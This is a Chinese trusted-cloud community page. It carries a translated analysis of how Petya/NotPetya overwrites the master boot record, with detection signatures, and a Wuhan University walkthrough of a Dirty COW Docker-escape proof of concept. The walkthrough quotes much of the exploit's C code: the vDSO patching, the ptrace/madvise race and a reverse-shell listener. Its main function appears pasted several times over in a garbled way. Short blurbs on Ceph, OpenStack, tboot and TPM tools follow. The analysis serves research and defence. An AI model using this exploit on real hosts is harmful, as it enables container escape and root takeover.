开源技术
开源技术列表

Petya勒索软件如何感染主引导扇区

上周,我们开始了对Petya(也叫NotPetya)及其所谓的“killswitch”的技术分析。在该博文中,我们提到Petya在Windows文件夹中查找与其自身具有相同文件名(无扩展名)的文件(例如:C:\ Windows \ Petya)。如果它存在,它将通过调用ExitProcess终止,如果不存在,它将创建一个具有DELETE_ON_CLOSE属性的文件。这似乎意味着这个文件不是一个killswitch,而是用来检验和查看系统是否已被感染的标记。 文件被创建后,Petya继续执行其磁盘访问功能。 Petya首先打开C:卷,并使用IOCTL_DISK_GET_DRIVE_GEOMETRY控制代码调用DeviceIoControl API,该代码检索有关物理磁盘的几何信息,特别是每个扇区的字节数。 它通过调用LocalAlloc分配固定内存,然后用新分配的字节重写C:卷的第二个扇区。这是卷引导记录运行引导加载程序(NTLDR)的位置,至少在Windows XP系统中,这将破坏引导顺序。图1 第二扇区,重写之前和之后接下来,它检查其进程标志以确定是否使用其代码重写MBR,或仅仅是将其损坏。该进程标志在它搜索内存中的某些进程时被设置得较早。如果此标志表示进程“avp.exe”被找到,它将继续我们调用的corrupt_mbr函数。如果其进程标志表示未找到进程“avp.exe”,它将进入我们调用的overwrite_mbr_func函数,该函数将替换MBR。图2 检查进程标志 上图2所示的函数corrupt_mbr只是将未初始化的内存(0xBAADF00D)的字节写入磁盘的前10个扇区,这些代码将使使磁盘无法启动。 另一个函数overwrite_mbr_func是恶意软件尝试用自己的代码重写MBR的地方。 Petya通过文件名为\\.\ PhysicalDrive0调用CreateFileA API开始,这对应于主引导记录。然后它使用IOCTL_DISK_GET_PARTITION_INFO_EX控制代码调用DeviceIoControl来检索有关MBR分区的类型,大小和性质的扩展信息。它使用此信息来检查PARTITION_INFORMATION_EX结构的PartitionStyle成员是否确实是MBR。 然后Petya使用CryptGenRandom API生成60(0x3C)个随机字节,并使用索引和这60个随机字节生成个人安装密钥。图3 生成个人安装密钥的索引功能 请注意,这个生成的密钥是作为赎金消息的一部分向用户显示的内容。图4 生成的个人安装密钥 接下来,恶意软件从物理驱动器的第一个扇区读取0x200个字节,并将字节异或7。这稍后被存回到扇区34的磁盘中。为了检查磁盘是否足够大以存储其恶意引导加载程序,它会读取最后一个分区的LBA值(它给出了磁盘的柱面,磁头和扇区的位置),以确保其大于0x28。 在接下来的几个步骤中,Petya取代物理驱动器的各个扇区:- 扇区0-18被替换为自己的恶意MBR代码,确保保留原始的磁盘签名和分区条目。- 扇区32被替换为Salsa20密钥/随机数,个人安装密钥和比特币地址(如下面的图5所示)。- 扇区33用'07'的十六进制字节填充。- 扇区34用异或7的原始的MBR的第一扇区填充。图5 写入33扇区的字节 如果重写过程中的任何步骤失败,Petya将通过调用其corrupt_mbr函数进行报复(参见图2)。正如我们提到的,这个功能会破坏磁盘的前10个扇区,使其无法启动。 目前,Petya的攻击可能已经放缓,但这并不意味着我们可以对我们的系统安全感到满足。最近该恶意软件的爆发显示,即使全世界各地在知道WannaCry造成的损害之后,任然有很多系统没有打上防御该恶意软件的补丁。在这次Petya爆发之后,我们真的没有任何借口不给系统及时打上相应的补丁。但我们不能仅仅打上补丁,一个好的防御系统可以大大减少新的恶意软件的威胁。 MD5: 71b6a493388e7d0b40c83ce903bc6b04Fortinet保护AV签名:W32/ Petya.EOB!TRW32/ Agent.YXH!TR其他签名正在探讨中。IPS签名:MS.Office.RTF.File.OLE.autolink.Code.Execution创建2017年4月13日最后更新2017年6月19日MS.SMB.Server.SMB1.Trans2.Secondary.Handling.Code.Execution创建2017年3月14日最后更新2017年6月5日此外,Fortinet WannaCry IPS规则似乎可以防止针对这些漏洞的利用。 Fortinet团队正在验证此声明。沙箱检测:Fortinet Sandbox(FSA)检测到此攻击。TOR通讯:通过AppControl签名阻止TOR出站流量。针对Petya的微软紧急更新Microsoft Windows SMB Server的安全更新:2017年3月14日Office 2016安全更新:2017年4月11日 中国可信云社区译

2017-07-10 14:48:28

脏牛漏洞Docker逃逸POC分析

武汉大学Docker安全研究小组(王鹃 何能斌 樊成阳 )一 、逃逸原理VDSOvDSO随内核发行,在程序启动时, 内核将其映射到某个地址空间,被所有程序所共享(这段内存是只读的).漏洞利用可以任意地址写任意数据的特性,将payload写到vDSO的内存页,并对clock_gettime()这个函数进行Inline Hook.因为这个地址的函数是被所有程序共享的,所以当宿主机有程序调用clock_gettime()函数时就会执行一遍payload,payload会对调用进程的UID进行检查,如果是0(root进程)就会对docker虚拟机进行连接,发送反弹shell,所以在docker虚拟机会得到宿主机的root权限的shell,然后断开监听,并将vDSO内存原数据还原。二 . 代码运行流程Main函数 int main(int argc, char *argv[]) { struct prologue *prologue; struct mem_arg arg; uint16_t int main(int argc, char *argv[]) { struct prologue *prologue; struct mem_arg arg; uint16_t port; uint32_t ip; int s; ip = htonl(PAYLOAD_IP); port = htons(PAYLOAD_PORT); if (argc > 1) { int main(int argc, char *argv[]) { struct prologue *prologue; struct mem_arg arg; uint16_t port; uint32_t ip; int s; ip = htonl(PAYLOAD_IP); port = htons(PAYLOAD_PORT); if (argc > 1) { if (parse_ip_port(argv[1], &ip, &port) != 0) return EXIT_FAILURE; } fprintf(stderr, "[*] payload target: %s:%d\n", inet_ntoa(*(struct in_addr *)&ip), ntohs(port)); arg.vdso_addr = get_vdso_addr(); if (arg.vdso_addr == NULL) return EXIT_FAILURE; prologue = fingerprint_prologue(arg.vdso_addr); if (prologue == NULL) { fprintf(stderr, "[-] this vDSO version isn't supported\n"); fprintf(stderr, " add first entry point instructions to prologues\n"); return EXIT_FAILURE; } if (patch_payload(prologue, ip, port) == -1) return EXIT_FAILURE; if (build_vdso_patch(arg.vdso_addr, prologue) == -1) return EXIT_FAILURE; s = create_socket(port); if (s == -1) return EXIT_FAILURE; if (exploit(&arg, true) == -1) { fprintf(stderr, "exploit failed\n"); return EXIT_FAILURE; } yeah(&arg, s); return EXIT_SUCCESS; } if (parse_ip_port(argv[1], &ip, &port) != 0) return EXIT_FAILURE; } fprintf(stderr, "[*] payload target: %s:%d\n", inet_ntoa(*(struct in_addr *)&ip), ntohs(port)); arg.vdso_addr = get_vdso_addr(); if (arg.vdso_addr == NULL) return EXIT_FAILURE; prologue = fingerprint_prologue(arg.vdso_addr); if (prologue == NULL) { fprintf(stderr, "[-] this vDSO version isn't supported\n"); fprintf(stderr, " add first entry point instructions to prologues\n"); return EXIT_FAILURE; } if (patch_payload(prologue, ip, port) == -1) return EXIT_FAILURE; if (build_vdso_patch(arg.vdso_addr, prologue) == -1) return EXIT_FAILURE; s = create_socket(port); if (s == -1) return EXIT_FAILURE; if (exploit(&arg, true) == -1) { fprintf(stderr, "exploit failed\n"); return EXIT_FAILURE; } yeah(&arg, s); return EXIT_SUCCESS; }port; uint32_t ip; int s; ip = htonl(PAYLOAD_IP); port = htons(PAYLOAD_PORT); if (argc > 1) { if (parse_ip_port(argv[1], &ip, &port) != 0) return EXIT_FAILURE; } fprintf(stderr, "[*] payload target: %s:%d\n", inet_ntoa(*(struct in_addr *)&ip), ntohs(port)); arg.vdso_addr = get_vdso_addr(); if (arg.vdso_addr == NULL) return EXIT_FAILURE; prologue = fingerprint_prologue(arg.vdso_addr); if (prologue == NULL) { fprintf(stderr, "[-] this vDSO version isn't supported\n"); fprintf(stderr, " add first entry point instructions to prologues\n"); return EXIT_FAILURE; } if (patch_payload(prologue, ip, port) == -1) return EXIT_FAILURE; if (build_vdso_patch(arg.vdso_addr, prologue) == -1) return EXIT_FAILURE; s = create_socket(port); if (s == -1) return EXIT_FAILURE; if (exploit(&arg, true) == -1) { fprintf(stderr, "exploit failed\n"); return EXIT_FAILURE; } yeah(&arg, s); return EXIT_SUCCESS; } 流程图如下所示:三 . 函数分析1 . htonl/htonshtonl 传统内存数据存储方式 -> 网络字节存储 4字节 eg : htonl(0x1234) -> 0x4321htons 传统内存数据存储方式 -> 网络字节存储 2字节 eg : htons(0x12) -> 0x212 . prase_ip_port函数原型static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)函数介绍如果输入参数有:,则将:前的字符转化为IP,后面的字符转化为端口并赋值给port使用示例eg:prase_ip_port("127.0.0.1:1234", ip, port)调用结果: IP = 127.0.0.1 PORT = 12343 . get_vdso_addr函数原型static void *get_vdso_addr(void){ return (void *)getauxval(AT_SYSINFO_EHDR);}函数介绍 通过getauxval()函数获取vDSO的地址4 . fingerprint_prologue函数原型static struct prologue * fingerprint_prologue(void *vdso_addr) 函数介绍通过vDSO的首地址,找到clock_gettime()函数的地址,然后对比clock_gettime函数前几个字符和prologue[]数 组的每一项,如果存在匹配项,则说明可以Inline Hook,返回匹配的prologue数组项关键代码for (i = 0; i < ARRAY_SIZE(prologues); i++) { p = &prologues[i]; if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0) return p; } 5 . patch_payload函数原型static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)函数介绍将payload中的IP,PORT,prologue项,分别替换成新的IP,PORT(通过参数修改),prologue(通过fingerprint_prologue()匹配得到)6 . build_vdso_patch函数原型static int build_vdso_patch(void *vdso_addr, struct prologue *prologue) 函数介绍 填充vdso_patch数组,如果要放置payload的内存地址数据不为0,则提示failed to find a place for the payload vdso_patch数组元素介绍 vdso_patch[0] vdso_patch[1] patch payload buf = “e8 0xxxxx” copy 保存原内存数据的内存地址 保存clock_gettime前prologue->size字节数据的内存地址 size payload_len prologue->size addr payload将要被复制到的内存地址 clock_gettime的地址 7 . create_socket函数原型static int create_socket(uint16_t port)函数介绍 设置一个监听socket,等待payload被执行,向这个socket发起连接8 . exploit函数原型static int exploit(struct mem_arg *arg, bool do_patch)函数介绍,通过漏洞,将数据写到指定内存地址 do_patch = true => 将payload写进vDSO,修改clock_gettime前面几个字节为jmp payload do_patch = false => 将vDSO地址中原来的数据还原回去主要代码pid = fork(); if (pid == -1) { warn("fork"); return -1; } else if (pid == 0) { check(arg); } arg->stop = false; pthread_create(&pth1, NULL, madviseThread, arg); pthread_create(&pth2, NULL, ptrace_thread, arg); 这里开启两个进程,子进程不停检查数据是否成功写入,成功则返回0,否则返回1 主线程开启两个线程, ptrace_thread 向vDSO写 madvise_thread 将vDSO映射空间释放,对ptrace线程造成干扰,从而触发漏洞,写入成功 ptrace循环写while (n >= sizeof(long)) { memcpy(&value, s, sizeof(value)); if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) { warn("ptrace(PTRACE_POKETEXT)"); return -1; } n -= sizeof(long); d += sizeof(long); s += sizeof(long); } madivise循环释放while (!arg->stop) { if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) { warn("madvise"); break; } } 9 . yeah函数原型static int yeah(struct mem_arg *arg, int s)函数介绍 等待连接 还原原vDSO空间数据 处理连接后的数据发送与接收关键代码 循环等待连接,有连接之后就关闭监听 while (1) { c = accept(s, (struct sockaddr *)&addr, &addr_len); if (c == -1) { if (errno == EINTR) continue; warn("accept"); return -1; } break; } close(s); 连接成功后,将vDSO还原if (fork() == 0) { if (exploit(arg, false) == -1) fprintf(stderr, "[-] failed to restore vDSO\n"); exit(0); } 绑定输入输出到socket,处理连接数据fds[0].fd = STDIN_FILENO; fds[0].events = POLLIN; fds[1].fd = c; fds[1].events = POLLIN; nfds = 2; while (nfds > 0) { if (poll(fds, nfds, -1) == -1) { if (errno == EINTR) continue; warn("poll"); break; } if (fds[0].revents == POLLIN) { n = read(STDIN_FILENO, buf, sizeof(buf)); if (n == -1) { if (errno != EINTR) { warn("read(STDIN_FILENO)"); break; } } else if (n == 0) { break; } else { writeall(c, buf, n); } } if (fds[1].revents == POLLIN) { n = read(c, buf, sizeof(buf)); if (n == -1) { if (errno != EINTR) { warn("read(c)"); break; } } else if (n == 0) { break; } else { writeall(STDOUT_FILENO, buf, n); } } }

2016-11-29 10:38:15

Ceph

Ceph是一种为优秀的性能、可靠性和可扩展性而设计的统一的、分布式文件系统。简单定义为以下3项:1. 可轻松扩展到数 PB 容量2. 支持多种工作负载的高性能(每秒输入/输出操作[IOPS]和带宽)3. 高可靠性但是,这些目标之间会互相竞争(例如,可扩展性会降低或者抑制性能或者影响可靠性)。Ceph 的设计还包括保护单一点故障的容错功能,它假设大规模(PB 级存储)存储故障是常见现象而不是例外情况。它的设计并没有假设某种特殊工作负载,但包括了适应变化的工作负载,并提供最佳性能的能力。它利用 POSIX 的兼容性完成所有这些任务,允许它对当前依赖 POSIX 语义(通过以 Ceph 为目标的改进)的应用进行透明的部署。

2016-01-08 14:11:52

Openstack

OpenStack是一个由NASA(美国国家航空航天局)和Rackspace合作研发并发起的,以Apache许可证授权的自由软件和开放源代码项目。OpenStack是一个开源的云计算管理平台项目,由几个主要的组件组合起来完成具体工作。OpenStack支持几乎所有类型的云环境,项目目标是提供实施简单、可大规模扩展、丰富、标准统一的云计算管理平台。OpenStack通过各种互补的服务提供了基础设施即服务(IaaS)的解决方案,每个服务提供API以进行集成。OpenStack是一个旨在为公共及私有云的建设与管理提供软件的开源项目。它的社区拥有超过130家企业及1350位开发者,这些机构与个人都将OpenStack作为基础设施即服务(IaaS)资源的通用前端。OpenStack项目的首要任务是简化云的部署过程并为其带来良好的可扩展性。本文希望通过提供必要的指导信息,帮助大家利用OpenStack前端来设置及管理自己的公共云或私有云。

2016-01-08 14:09:31

Tboot

Trusted Boot (tboot) is an open source, pre- kernel/VMM module that uses Intel(R) Trusted Execution Technology (Intel(R) TXT) to perform a measured and verified launch of an OS kernel/VMM.The first OS code loaded is the Trusted Boot (called TBOOT) code that sets up the platform for Intel TXT and initiates the measured launch before loading the OS kernel.In particular, the TBOOT module will setup the platform for a measured launch and then invoke the SENTER command. To better understand the role of the Tboot, consider the platform phases associated with measured launch, which are illustrated in Figure.The phases are as follows:1. Pre-boot phase is performed by the system firmware (BIOS/UEFI). One of the goals of an Intel TXT-enabled BIOS is to initialize the platform to a state that will support a “measured launch.” To do so, the firmware measures the Static Root of Trust and other platform components into PCRs 0 through 7. It also protects Intel TXT resources and locks the platform configuration.2. IPL represents the normal boot process up until the time that the process would normally load and execute the kernel. The first module executed should now be the Trusted Boot (tBoot) module.3. TBOOT Pre-Launch is the part of tBoot that determines whether a measured launch is possible and sets up the platform to perform the measured launch.4. TBOOT Launch is the part of tBoot that starts the measured launch process by executing the GETSEC [SENTER] instruction. This execution starts the dynamic chain of trust measurements, extending the root of trust measurement into PCR 17 and measures tBoot Post Code into PCR 18.5. TBOOT Post Launch is the code that executes as a result of the measured launch. Its purpose is to securely bring the platform to a protected, usable state. This is the first system code to be measured, and it starts the chain of measurements.6. OS/VMM Post Launch includes the kernel and any other modules that need to be loaded. The kernel is responsible for measuring other modules before they are executed if they have not already been measured by the tBoot code.7. Regular Operation commences after successful launch, when the OS/hypervisor performs its primary functionality (i.e., the same functionality as would occur in an environment without Intel TXT). However, there are some additional capabilities available to the OS/hypervisor, which must protect Intel TXT resources.8. MLE Shutdown occurs before turning off or resetting the platform; there are certain steps the OS/hypervisor is required to take to exit the secure environment. While this phase could be followed by another measured launch, it is typically followed by a platform reset or power cycle.CodeWebMailing Lists: tboot-devel@lists.sourceforge.net

2015-11-04 16:41:31

OAT

This project provides: A cloud management tool software development kit (SDK) source code and binariesThe value of the OpenAttestation projectThis project provides an SDK to create cloud management tools. These tools are capable of establishing the hosts’ integrity information by remotely retrieving and verifying integrity with Trusted Platform Module (TPM) quotes. OpenStack and oVirt both use OpenAttestation.Key features include:Support for major Linux host operating systemsPCR-based report schema and policy rulesRESTful based Query APIReference web portal/GUI implementationHistorical PCRs data tracking/comparisonWhitelist managementFlexible access control to attestation serverSupports Tomcat 2-way SSL/TLS for Query APIsHook for ISVs to implement custom access controlWho it’s forThis toolkit is available for cloud distributing OEMs, operating system vendors, and system builders. OpenAttestation is used by OpenStack, oVirt, Fedora, Ubuntu, and Red Hat Enterprise Linux.Project specificsThis project is distributed under the BSD license.About Intel involvementThese open source optimizations are used in servers featuring Intel® Atom™ processors, Intel® Xeon® processors, and Intel® Xeon Phi™ coprocessors.WikiCodeWebIssueMail llist: oat-devel@lists.01.org

2015-11-04 16:25:39

Minnowboard:MinnowMax

MinnowBoard MAX is the second generation MinnowBoard (released in July 2014), updating and replacing the original MinnowBoard. The MinnowBoard MAX board has an upgraded 64-bit Intel®Atom™ E3800 (Bay Trail-I) processor with better graphics and revised I/O, shrinks the footprint by more than half, supports additional operating systems (Linux*, Android*, and Windows*) and significantly improves on the original board on price, performance, and energy consumption.link

2015-11-04 16:00:40

EDKII

The EFI Developer Kit (EDK) is an Open Source release of the Framework Foundations, defined in the Framework Core Interface Specifications (CIS), plus a set of sample drivers and three sample targets implemented for the Nt32, Unix, and DUET platforms.In addition to Open Sourcing the Framework Foundation code, the EDK allows for the development, debugging, and testing of EFI and DXE drivers, Option ROMs, and pre-Boot applications. To solve customer feedback exposed by using EDK, Intel started a remodeling plan now known as EDKII. It focuses on how to make it easy for customers to write a specific kind of module, to port and to customize modules to a platform. EDKII CodeTPM2 drivers

2015-11-04 15:56:17

TPM2.0-TSS

TPM (Trusted Platform Module) 2.0 Software Stack (TSS):This stack consists of the following layers from top to bottom:Feature API (FAPI), see specification 0.12, (published but still in progress and unimplemented)Enhanced System API (ESAPI), (specification in progress and unimplemented)System API (SAPI), see 1.0 specification, (public, 0.97 implementation complete). This layer implements the system layer API level of the TSS 2.0 specification. These functions can be used to access all TPM 2.0 functions as described in Part 3 of the TPM 2.0 specification. The usefulness of this code extends to all users of the TPM, even those not planning to use the upper layers of the TSS.TPM Command Transmission Interface (TCTI), used by SAPI to communicate with next lower layer (either the TAB/RM or TPM 2.0 device driver), see SAPI specificationTrusted Access Broker/Resource Manager (TAB/RM), see 0.91 specification, (public, implementation complete). This layer sits between the system API library code and the TPM. It is a daemon that handles all multi-process coordination and manages the TPM's internal resources transparently to applications.Since the FAPI and ESAPI haven't been implemented yet, this repository only contains the SAPI and layers below it, plus a test application for exercising the SAPI.The test application, tpmclient, tests many of the commands against the TPM 2.0 simulator. The tpmclient application can be altered and used as a sandbox to test and develop any TPM 2.0 command sequences, and provides an excellent development and learning vehicle.This site contains the code for the TPM (Trusted Platform Module) 2.0 Software Stack (TSS). TPM2.0-TSS

2015-11-04 15:35:56
 后台管理
联系我们

• 电话:18986213038

• 邮箱:jwang@whu.edu.cn

关注我们

• 扫描右侧二维码关注我们

• 可信云计算技术社区

中国可信云社区